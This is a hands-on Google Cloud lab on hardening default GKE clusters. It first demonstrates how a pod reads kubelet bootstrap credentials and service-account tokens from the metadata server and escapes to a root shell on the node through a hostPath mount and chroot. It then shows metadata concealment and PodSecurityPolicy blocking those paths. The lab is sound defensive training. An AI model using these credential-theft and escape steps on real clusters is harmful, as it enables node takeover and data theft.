
Hardening Default GKE Cluster Configurations


1 hour 30 minutes 7 Credits

GSP496


Overview

This lab demonstrates some of the security concerns of a default GKE cluster configuration and the corresponding hardening measures to prevent multiple paths of pod escape and cluster privilege escalation. These attack paths are relevant in the following scenarios:

  1. An application flaw in an external facing pod that allows for Server-Side Request Forgery (SSRF) attacks.
  2. A fully compromised container inside a pod allowing for Remote Command Execution (RCE).
  3. A malicious internal user or an attacker with a set of compromised internal user credentials with the ability to create/update a pod in a given namespace.

This lab was created by GKE Helmsman engineers to help you gain a better understanding of hardening default GKE cluster configurations.

The example code for this lab is provided as-is, without warranty or guarantee.

Objectives

Upon completion of this lab, you will understand the need for protecting the GKE instance metadata and defining appropriate PodSecurityPolicy policies for your environment.

You will:

  1. Create a small GKE cluster using the default settings.

  2. Validate the most common paths of pod escape and cluster privilege escalation from the perspective of a malicious internal user.

  3. Harden the GKE cluster for these issues.

  4. Validate the cluster so that those actions are no longer allowed.

Setup and requirements

Before you click the Start Lab button

Read these instructions. Labs are timed and you cannot pause them. The timer, which starts when you click Start Lab, shows how long Google Cloud resources will be made available to you.

This hands-on lab lets you do the lab activities yourself in a real cloud environment, not in a simulation or demo environment. It does so by giving you new, temporary credentials that you use to sign in and access Google Cloud for the duration of the lab.

To complete this lab, you need:

  • Access to a standard internet browser (Chrome browser recommended).
Note: Use an Incognito or private browser window to run this lab. This prevents any conflicts between your personal account and the Student account, which may cause extra charges to be incurred on your personal account.
  • Time to complete the lab---remember, once you start, you cannot pause a lab.
Note: If you already have your own personal Google Cloud account or project, do not use it for this lab to avoid extra charges to your account.

How to start your lab and sign in to the Google Cloud Console

  1. Click the Start Lab button. If you need to pay for the lab, a pop-up opens for you to select your payment method. On the left is the Lab Details panel with the following:

    • The Open Google Console button
    • Time remaining
    • The temporary credentials that you must use for this lab
    • Other information, if needed, to step through this lab
  2. Click Open Google Console. The lab spins up resources, and then opens another tab that shows the Sign in page.

    Tip: Arrange the tabs in separate windows, side-by-side.

    Note: If you see the Choose an account dialog, click Use Another Account.
  3. If necessary, copy the Username from the Lab Details panel and paste it into the Sign in dialog. Click Next.

  4. Copy the Password from the Lab Details panel and paste it into the Welcome dialog. Click Next.

    Important: You must use the credentials from the left panel. Do not use your Google Cloud Skills Boost credentials. Note: Using your own Google Cloud account for this lab may incur extra charges.
  5. Click through the subsequent pages:

    • Accept the terms and conditions.
    • Do not add recovery options or two-factor authentication (because this is a temporary account).
    • Do not sign up for free trials.

After a few moments, the Cloud Console opens in this tab.

Note: You can view the menu with a list of Google Cloud Products and Services by clicking the Navigation menu at the top-left.

Activate Cloud Shell

Cloud Shell is a virtual machine that is loaded with development tools. It offers a persistent 5GB home directory and runs on the Google Cloud. Cloud Shell provides command-line access to your Google Cloud resources.

  1. Click Activate Cloud Shell at the top of the Google Cloud console.

When you are connected, you are already authenticated, and the project is set to your PROJECT_ID. The output contains a line that declares the PROJECT_ID for this session:

Your Cloud Platform project in this session is set to YOUR_PROJECT_ID

gcloud is the command-line tool for Google Cloud. It comes pre-installed on Cloud Shell and supports tab-completion.

  2. (Optional) You can list the active account name with this command:

gcloud auth list
  3. Click Authorize.

  4. Your output should now look like this:

Output:

ACTIVE: *
ACCOUNT: student-01-xxxxxxxxxxxx@qwiklabs.net

To set the active account, run:
    $ gcloud config set account `ACCOUNT`
  5. (Optional) You can list the project ID with this command:

gcloud config list project

Output:

[core]
project = <project_ID>

Example output:

[core]
project = qwiklabs-gcp-44776a13dea667a6

Note: For full documentation of gcloud, in Google Cloud, refer to the gcloud CLI overview guide.

Task 1. Create a simple GKE cluster

  1. Set a zone in an environment variable called MY_ZONE. This lab uses us-central1-a, but you can select a different zone if you prefer:

export MY_ZONE=us-central1-a
  2. Run the following command to start a Kubernetes cluster named simplecluster, managed by Kubernetes Engine, and configure it to run 2 nodes:

gcloud container clusters create simplecluster --zone $MY_ZONE --num-nodes 2 --metadata=disable-legacy-endpoints=false

It takes several minutes to create a cluster as Kubernetes Engine provisions virtual machines for you. The warnings about features available in new versions can be safely ignored for this lab.

  3. After the cluster is created, check your installed version of Kubernetes using the kubectl version command:

kubectl version

The gcloud container clusters create command automatically authenticated kubectl for you.

  4. View your running nodes in the Cloud Console. On the Navigation menu, click Compute Engine > VM Instances.

Your Kubernetes cluster is now ready for use.
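
Optionally, you can also confirm from Cloud Shell that both nodes registered with the cluster (the node names in your output will differ):

kubectl get nodes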

Click Check my progress to verify the objective. Create a simple GKE cluster

Task 2. Run a Google Cloud-SDK pod

  1. From your Cloud Shell prompt, launch a single instance of the Google Cloud-SDK container:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

This will take a few minutes to complete.

Note: If you get a timed out error, run the command again.
  2. You should now have a bash shell inside the pod's container:
root@gcloud:/#

It may take a few seconds for the container to be started and the command prompt to be displayed. If you don't see a command prompt, try pressing Enter.

Explore the Compute Metadata endpoint

  1. Run the following command to access the v1 Compute Metadata endpoint:

curl -s http://metadata.google.internal/computeMetadata/v1/instance/name

Output looks like:

...snip...
Your client does not have permission to get URL /computeMetadata/v1/instance/name
from this server. Missing Metadata-Flavor:Google header.
...snip...

Notice how it returns an error stating that it requires the custom HTTP header to be present.

  2. Add the custom header on the next run and retrieve the Compute Engine instance name that is running this pod:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name

Output looks like:

gke-simplecluster-default-pool-b57a043a-6z5v

Note: If a custom HTTP header were not required to access the Compute Engine Instance Metadata endpoint, an attacker would only need an application flaw that lets them control a URL the application fetches (SSRF) in order to obtain credentials. By requiring a custom HTTP header, the attack is more difficult because the attacker needs both an application flaw and the ability to send the custom header to be successful.

Keep this shell inside the pod available for the next step.

  3. If you accidentally exit from the pod, simply re-run:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

Explore the GKE node bootstrapping credentials

  1. From inside the same pod shell, run the following command to list the attributes associated with the underlying Compute Engine instances. Be sure to include the trailing slash:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/

Perhaps the most sensitive data in this listing is kube-env. It contains several variables which the kubelet uses as initial credentials when attaching the node to the GKE cluster. The variables CA_CERT, KUBELET_CERT, and KUBELET_KEY contain this information and are therefore considered sensitive to non-cluster administrators.

  2. To see the potentially sensitive variables and data, run the following command:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env
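
If you only want to isolate the credential-bearing variables instead of scrolling through the full document, a simple filter like the following should work (this assumes the cluster still exposes the legacy certificate-based bootstrap variables; exact names can vary by GKE version):

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | grep -E '^(CA_CERT|KUBELET_CERT|KUBELET_KEY):'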

Therefore, in any of the following situations:

  • A flaw that allows for SSRF in a pod application
  • An application or library flaw that allows for RCE in a pod
  • An internal user with the ability to create or exec into a pod

There is a high likelihood of compromise and exfiltration of sensitive kubelet bootstrapping credentials via the Compute Metadata endpoint. With the kubelet credentials, it is possible in certain circumstances to escalate privileges to cluster-admin and therefore gain full control of the GKE cluster, including all data, applications, and access to the underlying nodes.

Leverage the Permissions assigned to this Node Pool's service account

By default, Google Cloud projects with the Compute API enabled have a default service account in the format of NNNNNNNNNN-compute@developer.gserviceaccount.com in the project and the Editor role attached to it. Also by default, GKE clusters created without specifying a service account will utilize the default Compute service account and attach it to all worker nodes.
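
As an optional check from Cloud Shell (not a graded step), you can confirm which service account is attached to your nodes by describing the default node pool; a value of default indicates the Compute Engine default service account:

gcloud container node-pools describe default-pool --cluster simplecluster --zone $MY_ZONE --format 'value(config.serviceAccount)'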

  1. Run the following curl command to list the OAuth scopes associated with the service account attached to the underlying Compute Engine instance:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

(Output)

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/trace.append

The combination of authentication scopes and the permissions of the service account dictates what applications on this node can access. The above list is the minimum scopes needed for most GKE clusters, but some use cases require increased scopes.

Warning: If, during cluster creation, you configured the authentication scope to include `https://www.googleapis.com/auth/cloud-platform`, any Google Cloud API would be in scope and only IAM permissions assigned to the service account would determine access.

Further, if the default service account with the default IAM Role of Editor is in use, any pod on this node pool has Editor permissions to the Google Cloud project where the GKE cluster is deployed. As the Editor IAM Role has a wide range of read/write permissions to interact with project resources such as Compute instances, Cloud Storage buckets, GCR registries, and more, this is a significant security risk.
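
To illustrate why this matters (not a graded step), any pod on this node pool can request an OAuth access token for the node's service account directly from the metadata server; that token carries whatever scopes are listed above combined with the service account's IAM permissions:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
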
  2. Exit out of this pod by typing:

exit

Note: If you do not return to Cloud Shell, press Ctrl+C.

Task 3. Deploy a pod that mounts the host filesystem

One of the simplest paths for "escaping" to the underlying host is by mounting the host's filesystem into the pod's filesystem using standard Kubernetes volumes and volumeMounts in a Pod specification.

  1. To demonstrate this, run the following to create a Pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath
spec:
  containers:
  - name: hostpath
    image: google/cloud-sdk:latest
    command: ["/bin/bash"]
    args: ["-c", "tail -f /dev/null"]
    volumeMounts:
    - mountPath: /rootfs
      name: rootfs
  volumes:
  - name: rootfs
    hostPath:
      path: /
EOF
  2. Delete the gcloud pod:

kubectl delete pod gcloud
  3. Run kubectl get pod and re-run until it's in the "Running" state:

kubectl get pod

(Output)

NAME       READY   STATUS    RESTARTS   AGE
hostpath   1/1     Running   0          30s

Click Check my progress to verify the objective. Deploy a pod that mounts the host filesystem

Task 4. Explore and compromise the underlying host

  1. Run the following to obtain a shell inside the pod you just created:

kubectl exec -it hostpath -- bash
  2. Switch the pod shell's root filesystem to point to that of the underlying host:

chroot /rootfs /bin/bash

With those simple commands, the pod is now effectively a root shell on the node. You are now able to do the following:

run the standard docker command with full permissions

docker ps

list docker images

docker images

docker run a privileged container of your choosing

docker run --privileged <imagename>:<imageversion>

examine the Kubernetes secrets mounted

mount | grep volumes | awk '{print $3}' | xargs ls

exec into any running container (even into another pod in another namespace)

docker exec -it <docker container ID> sh

Nearly every operation that the root user can perform is available to this pod shell. This includes persistence mechanisms like adding SSH users/keys, running privileged docker containers on the host outside the view of Kubernetes, and much more.
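
For example, from the chroot'd shell you can read the node's kubelet configuration and credentials directly (the exact paths may vary by GKE node image and version):

cat /var/lib/kubelet/kubeconfig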

  3. To exit the pod shell, run exit twice: once to leave the chroot, and once more to leave the pod's shell:

exit
exit

Note: If you do not return to Cloud Shell, press Ctrl+C.

  4. Now you can delete the hostpath pod:

kubectl delete pod hostpath

Understand the available controls

The next steps of this demo will cover:

  • Disable the Legacy Compute Engine Metadata API Endpoint - By specifying a custom metadata key and value, the v1beta1 metadata endpoint will no longer be available from the instance.

  • Enable Metadata Concealment - By passing an additional configuration during cluster and/or node pool creation, a lightweight proxy is installed on each node that proxies all requests to the Metadata API and prevents access to sensitive endpoints.

  • Enable and configure PodSecurityPolicy - Configuring this option on a GKE cluster adds the PodSecurityPolicy Admission Controller, which can be used to restrict the use of insecure settings during Pod creation. In this demo's case, the policy prevents containers from running as the root user and from mounting the underlying host filesystem.

Task 5. Deploy a second node pool

To enable you to experiment with and without the Metadata endpoint protections in place, you'll create a second node pool that includes two additional settings. Pods that are scheduled to the generic node pool will not have the protections, and Pods scheduled to the second node pool will have them enabled.

Note: Legacy endpoints were deprecated on September 30, 2020. In GKE versions 1.12 and newer, the `--metadata=disable-legacy-endpoints=true` setting is automatically enabled. The next command below explicitly defines it for clarity.
  • Create the second node pool:

gcloud beta container node-pools create second-pool --cluster=simplecluster --zone=$MY_ZONE --num-nodes=1 --metadata=disable-legacy-endpoints=true --workload-metadata-from-node=SECURE
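
Once the command completes, a quick way to confirm that both node pools exist is to list them (names and versions in your output may differ):

gcloud container node-pools list --cluster=simplecluster --zone=$MY_ZONE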

Click Check my progress to verify the objective. Deploy a second node pool

Task 6. Run a Google Cloud-SDK pod

  1. In Cloud Shell, launch a single instance of the Google Cloud-SDK container that will be run only on the second node pool with the protections enabled and not run as the root user:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never --overrides='{ "apiVersion": "v1", "spec": { "securityContext": { "runAsUser": 65534, "fsGroup": 65534 }, "nodeSelector": { "cloud.google.com/gke-nodepool": "second-pool" } } }' -- bash

Note: If you get a timed out error, run the command again.

  2. You should now have a bash shell inside the pod's container running on the node pool named second-pool. You should see the following:
nobody@gcloud:/$

It may take a few seconds for the container to start and the command prompt to open.

If you don't see a command prompt, press Enter.
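
You can also confirm the container is not running as root by checking the effective user inside the pod (the exact group names shown may vary by image):

id

(Example Output)

uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)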

Explore various blocked endpoints

  1. With the configuration of the second node pool set to --workload-metadata-from-node=SECURE, the following command to retrieve the sensitive kube-env data will now fail:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

(Output)

This metadata endpoint is concealed.
  2. But other commands to non-sensitive endpoints will still succeed if the proper HTTP header is passed:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name

(Example Output)

gke-simplecluster-second-pool-8fbd68c5-gzzp
  3. Exit out of the pod:

exit

You should now be back in Cloud Shell.

Task 7. Deploy PodSecurityPolicy objects

  1. In order to have the necessary permissions to proceed, grant explicit permissions to your own user account to become cluster-admin:

kubectl create clusterrolebinding clusteradmin --clusterrole=cluster-admin --user="$(gcloud config list account --format 'value(core.account)')"

(Output)

clusterrolebinding.rbac.authorization.k8s.io/clusteradmin created
  2. Next, deploy a more restrictive PodSecurityPolicy that will apply to all authenticated users in the default namespace:

cat <<EOF | kubectl apply -f -
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restrictive-psp
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default'
    apparmor.security.beta.kubernetes.io/allowedProfileNames: 'runtime/default'
    seccomp.security.alpha.kubernetes.io/defaultProfileName: 'docker/default'
    apparmor.security.beta.kubernetes.io/defaultProfileName: 'runtime/default'
spec:
  privileged: false
  # Required to prevent escalations to root.
  allowPrivilegeEscalation: false
  # This is redundant with non-root + disallow privilege escalation,
  # but we can provide it for defense in depth.
  requiredDropCapabilities:
    - ALL
  # Allow core volume types.
  volumes:
    - 'configMap'
    - 'emptyDir'
    - 'projected'
    - 'secret'
    - 'downwardAPI'
    # Assume that persistentVolumes set up by the cluster admin are safe to use.
    - 'persistentVolumeClaim'
  hostNetwork: false
  hostIPC: false
  hostPID: false
  runAsUser:
    # Require the container to run without root privileges.
    rule: 'MustRunAsNonRoot'
  seLinux:
    # This policy assumes the nodes are using AppArmor rather than SELinux.
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'MustRunAs'
    ranges:
      # Forbid adding the root group.
      - min: 1
        max: 65535
  fsGroup:
    rule: 'MustRunAs'
    ranges:
      # Forbid adding the root group.
      - min: 1
        max: 65535
EOF

(Output)

podsecuritypolicy.extensions/restrictive-psp created
  3. Next, add the ClusterRole that provides the necessary ability to "use" this PodSecurityPolicy:

cat <<EOF | kubectl apply -f -
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: restrictive-psp
rules:
- apiGroups:
  - extensions
  resources:
  - podsecuritypolicies
  resourceNames:
  - restrictive-psp
  verbs:
  - use
EOF

(Output)

clusterrole.rbac.authorization.k8s.io/restrictive-psp created
  4. Finally, create a RoleBinding in the default namespace that allows any authenticated user permission to leverage the PodSecurityPolicy:

cat <<EOF | kubectl apply -f -
---
# All authenticated users in the default namespace
# can 'use' the 'restrictive-psp' PSP
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: restrictive-psp
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: restrictive-psp
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated
EOF

(Output)

rolebinding.rbac.authorization.k8s.io/restrictive-psp created

Note: In a real environment, consider replacing the system:authenticated group in the RoleBinding with the specific users or service accounts that you want to have the ability to create pods in the default namespace.
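
Optionally, you can confirm that all three objects were created before turning on enforcement (not a graded step):

kubectl get psp restrictive-psp
kubectl get clusterrole restrictive-psp
kubectl get rolebinding restrictive-psp -n default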

Click Check my progress to verify the objective. Deploy PodSecurityPolicy objects

Enable PodSecurityPolicy

  • Enable the PodSecurityPolicy Admission Controller:

gcloud beta container clusters update simplecluster --zone $MY_ZONE --enable-pod-security-policy

This takes a few minutes to complete.
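
When the update finishes, you can verify that enforcement is on; a value of True indicates the admission controller is enabled (this check assumes the beta API surface used by this lab):

gcloud beta container clusters describe simplecluster --zone $MY_ZONE --format 'value(podSecurityPolicyConfig.enabled)'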

Task 8. Deploy a blocked pod that mounts the host filesystem

Because the account used to deploy the GKE cluster was granted cluster-admin permissions in a previous step, it's necessary to create another separate "user" account to interact with the cluster and validate the PodSecurityPolicy enforcement.

  1. To do this, run:

gcloud iam service-accounts create demo-developer

(Output)

Created service account [demo-developer].
  2. Next, run these commands to grant the service account the permissions it needs - the ability to interact with the cluster and attempt to create pods:

MYPROJECT=$(gcloud config list --format 'value(core.project)')
gcloud projects add-iam-policy-binding "${MYPROJECT}" --role=roles/container.developer --member="serviceAccount:demo-developer@${MYPROJECT}.iam.gserviceaccount.com"
  3. Obtain the service account credentials file by running:

gcloud iam service-accounts keys create key.json --iam-account "demo-developer@${MYPROJECT}.iam.gserviceaccount.com"
  4. Configure gcloud to authenticate as this service account:

gcloud auth activate-service-account --key-file=key.json
  5. To configure kubectl to use these credentials when communicating with the cluster, run:

gcloud container clusters get-credentials simplecluster --zone $MY_ZONE
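
Optionally, confirm which identity kubectl is now using and that it is still allowed to create pods in the default namespace (a sanity check, not a graded step):

gcloud config get-value account
kubectl auth can-i create pods --namespace default
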
  6. Now, try to create another pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath
spec:
  containers:
  - name: hostpath
    image: google/cloud-sdk:latest
    command: ["/bin/bash"]
    args: ["-c", "tail -f /dev/null"]
    volumeMounts:
    - mountPath: /rootfs
      name: rootfs
  volumes:
  - name: rootfs
    hostPath:
      path: /
EOF
  7. The following output validates that the pod is blocked by the PodSecurityPolicy:
Error from server (Forbidden): error when creating "STDIN": pods "hostpath" is forbidden: unable to validate against any pod security policy: [spec.volumes[0]: Invalid value: "hostPath": hostPath volumes are not allowed to be used]
  8. Deploy another pod that meets the criteria of the restrictive-psp:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath
spec:
  securityContext:
    runAsUser: 1000
    fsGroup: 2000
  containers:
  - name: hostpath
    image: google/cloud-sdk:latest
    command: ["/bin/bash"]
    args: ["-c", "tail -f /dev/null"]
EOF

(Output)

pod/hostpath created
  9. To view the annotation that gets added to the pod indicating which PodSecurityPolicy authorized the creation, run:

kubectl get pod hostpath -o=jsonpath="{ .metadata.annotations.kubernetes\.io/psp }"

(Output appended to the Cloud Shell command line)

restrictive-psp

Click Check my progress to verify the objective. Deploy a blocked pod that mounts the host filesystem

Congratulations!

In this lab you configured a default Kubernetes cluster in Google Kubernetes Engine. You then probed and exploited the access available to your pod, hardened the cluster, and validated those malicious actions were no longer possible.

Finish your quest

This self-paced lab is part of the Google Kubernetes Engine Best Practices: Security quest. A quest is a series of related labs that form a learning path. Completing this quest earns you a badge to recognize your achievement. You can make your badge or badges public and link to them in your online resume or social media account. Enroll in this quest or any quest that contains this lab and get immediate completion credit. See the Google Cloud Skills Boost catalog to see all available quests.

Take your next lab

Continue your Quest with Google Kubernetes Engine Security: Binary Authorization, or check out other Google Cloud Skills Boost labs.

Next steps / Learn more

IMPORTANT: While this lab covers several security issues in detail, there are other areas that should be considered in your environment. Refer to Harden your cluster's security Guide for additional information.

PodSecurityPolicy: Using PodSecurityPolicies Guide and Harden your cluster's security Guide

Node Service Accounts: Permissions Guide

Protecting Node Metadata: Protect node metadata Guide

Google Cloud training and certification

...helps you make the most of Google Cloud technologies. Our classes include technical skills and best practices to help you get up to speed quickly and continue your learning journey. We offer fundamental to advanced level training, with on-demand, live, and virtual options to suit your busy schedule. Certifications help you validate and prove your skill and expertise in Google Cloud technologies.

Manual Last Updated June 29, 2022

Lab Last Tested October 23, 2021

Copyright 2022 Google LLC All rights reserved. Google and the Google logo are trademarks of Google LLC. All other company and product names may be trademarks of the respective companies with which they are associated.